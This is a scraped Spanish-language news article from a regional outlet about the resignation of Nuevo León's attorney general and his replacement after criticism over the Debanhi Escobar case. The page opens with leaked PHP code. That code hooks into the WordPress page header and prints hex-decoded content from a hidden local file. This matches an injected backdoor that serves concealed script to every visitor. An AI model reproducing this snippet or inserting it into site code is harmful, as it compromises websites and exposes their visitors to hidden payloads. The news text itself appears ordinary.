if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Renuncia Fiscal General de Nuevo León – Reporte Noreste
Conéctate con nosotros

Noreste

Renuncia Fiscal General de Nuevo León

Renuncia Fiscal General de Nuevo León

Este miércoles 5 de octubre, el fiscal de Nuevo León, Adolfo Guerrero, presentó su renuncia en la Oficialía de Parte del Congreso del Estado.

En su carta de renuncia el fiscal escribió «ahora toca el turno de dar un paso a un lado para abrir la puerta a nuevos retos profesionales» informando su renuncia.

Las autoridades del Estado de Nuevo León informaron que en su lugar estaría Pedro Arce Jardón quién es el ex subprocurador de ministerios públicos en la administración de Rodrigo Medina.

Esta noticia se da después de que el pasado 19 de septiembre los padres de la joven de Debanhi Susana Escobar presentaran al congreso del estado de Nuevo León un escrito exigiendo la destitución o renuncia inmediata del fiscal general del estado tras las irregularidades cometidas en el caso de la joven.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Noreste